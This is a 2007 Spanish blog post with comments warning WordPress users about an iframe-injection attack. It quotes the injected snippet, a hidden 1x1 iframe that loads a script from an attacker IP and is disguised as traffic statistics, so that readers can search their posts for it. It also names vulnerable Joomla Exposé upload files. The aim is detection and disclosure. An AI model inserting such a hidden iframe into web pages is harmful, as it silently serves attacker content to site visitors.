Fallo grave en WordPress

Posted on November 6th, 2007 in WordPress by Eduard Fernandez

Ayer tadaba mucho en cargar este blog (más de lo normal), cuando me fijé que en la barra de estado ponía “Esperando a 61.132.75.71…” y como no pensé, WTF!?

Rebuscando un poco, parace ser que es un fallo que afecta a varias versiones de WordPress (incluyendo la 2.3.1) y todavía no ha salido ningún parche ni actualización para este bug que están explotando desde China. Si alguien tiene alguna pista o ha localizado algo raro en sus logs, que haga el favor de enviarlo al ticket abierto en WordPress para ver si encuentran por donde se esta produciendo este ataque.

Para saber si nos han inyectado este código en nuestro blog, sólo tenemos que buscar la siguiente IP: 61.132.75.71, dentro del contenido de nuestros posts, donde veremos un código como este:
<!-- Traffic Statistics -->
<iframe src=http://61.132.75.71/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe>
<!-- End Traffic Statistics -->

Este código está dentro del contenido y no de los templates, y hay gente que lleva sufriendo estos ataques desde hace un mes. También gente que usa Joomla, se están quejando del mismo fallo, aunque aquí parece estar relacionado con el módulo Exposé (una galería de imagenes) y los archivos administrator/components/com_expose/uploadimg.php y uploadimage.php.

Comparte el artículo:Estos íconos enlazan con webs de marcadores sociales que permiten a los lectores compartir y descubrir nuevas webs.
  • meneame
  • fresqui
  • digg
  • del.icio.us
  • Reddit
  • YahooMyWeb
Articulos relacionados:
  • AutoHeader: Plugin para Wordpress
  • WordPress 2.3 disponible
  • WordPress pasa de Technorati y cambia a Google
  • Google SiteMaps no funciona?
  • Nueva versión del plugin AutoHeader y del manual de compresión

    • 8 Responses to 'Fallo grave en WordPress'

    Subscribe to comments with RSS or TrackBack to 'Fallo grave en WordPress'.

    1. Nuevo fallo en Wordpress, insercción de iframe | aNieto2K said,

      on November 6th, 2007 at 12:08 pm

      […] de De Mas Blog, me avisa de que han reportado un nuevo bug de Wordpress, que aún están por corregir, pero que si conocemos podemos estar atentos para […]

    2. alex said,

      on November 6th, 2007 at 3:48 pm

      Hmm, no sé si sea un fallo de WordPress o no, pero sería bueno ver los logs para ver si hay algo que revele el problema.

    3. fermuned said,

      on November 6th, 2007 at 6:42 pm

      Estoy en ello, pero los de esta noche no los tendré hasta mañana…de momento he parcheado el wp-app.php como comentas en tu web, aunque si el bug (o posible bug) afecta a la 2.3.1 como comentan por WP no creo que sirva de mucho de momento.

      Un saludo y gracias!

    4. Planeta WordPress » Blog Archive » Nuevo fallo en Wordpress, insercción de iframe said,

      on November 6th, 2007 at 7:43 pm

      […] de De Mas Blog, me avisa de que han reportado un nuevo bug de Wordpress, que aún están por corregir, pero que si conocemos podemos estar atentos para […]

    5. g30rg3_x said,

      on November 7th, 2007 at 10:35 pm

      Hola fermuned,

      Gracias por el aviso del fallo, ahora (al igual que de seguro el buen alex) estaremos buscando posibles causas, repercusiones y claro la solución.

      Sin embargo creo tener el problema o la posible fuga de donde venga…

      He revisado el post y he seguido a todos los usuarios que han reportado ataques a su web (incluida la tuya) y todas tienen un mismo factor:
      -> Registro de Usuarios (subscriptores).

      No he visto ningún reporte que me indique lo contrario, así que de seguro este es un problema relacionado con usuarios registrados como subscriptores y no con usuarios normales (o visitantes).
      así que de seguro checando por tu lista de subscriptores encontraras algun ser extraño que se ha colado (registrado) y con ese privilegio (minimo) ha logrado postear el iframe…

      Tocara investigar mas y claro hacer el parche (si es que lo amerita) asi que por el momento todo me indica hacia ese lado que ya mencione..

      Saludos

    6. fermuned said,

      on November 7th, 2007 at 11:35 pm

      Hola g30rg3_x, gacias por tu interés!

      He estado dando vueltas a lo de los usuarios, y no descarto que haya sido ese el método (via WordPress).
      El caso es que he visto que tengo 3 usuarios registrados (poset97qq, domi95bin4 y xdfsd45oi) que eran para aprovechar una vulnerabilidad anterior (http://www.shellscript.co.uk/2007/08/26/oh-no-not-again/) y no se si pueden estar involucrados en este nuevo caso.

      Por los demás usuarios, poco hay que añadir: son pocos y no hay nota de su accesso en los logs el día de lo ocurrido.

      Cualquier consejo/ayuda será bienvenida.
      Un saludo!

    7. Eviten el uso del plugin iMP-Download para WordPress en Buayacorp - Diseño y Programación said,

      on November 12th, 2007 at 8:00 pm

      […] atrás iba a quedar como borrador, pero visto las repercusiones en blogs hispanos sobre un supuesto nuevo problema de seguridad de WordPress, publico esta entrada porque el sitio afectado usaba este plugin — […]

    8. Eduard Fernández » Blog Archive » Sigue el fallo de WordPress said,

      on November 29th, 2007 at 11:20 am

      […] unos días comenté un ataque de inyección de SQL posiblemente aprovechando algún bug de WordPress en el blog sobre […]

    Post a comment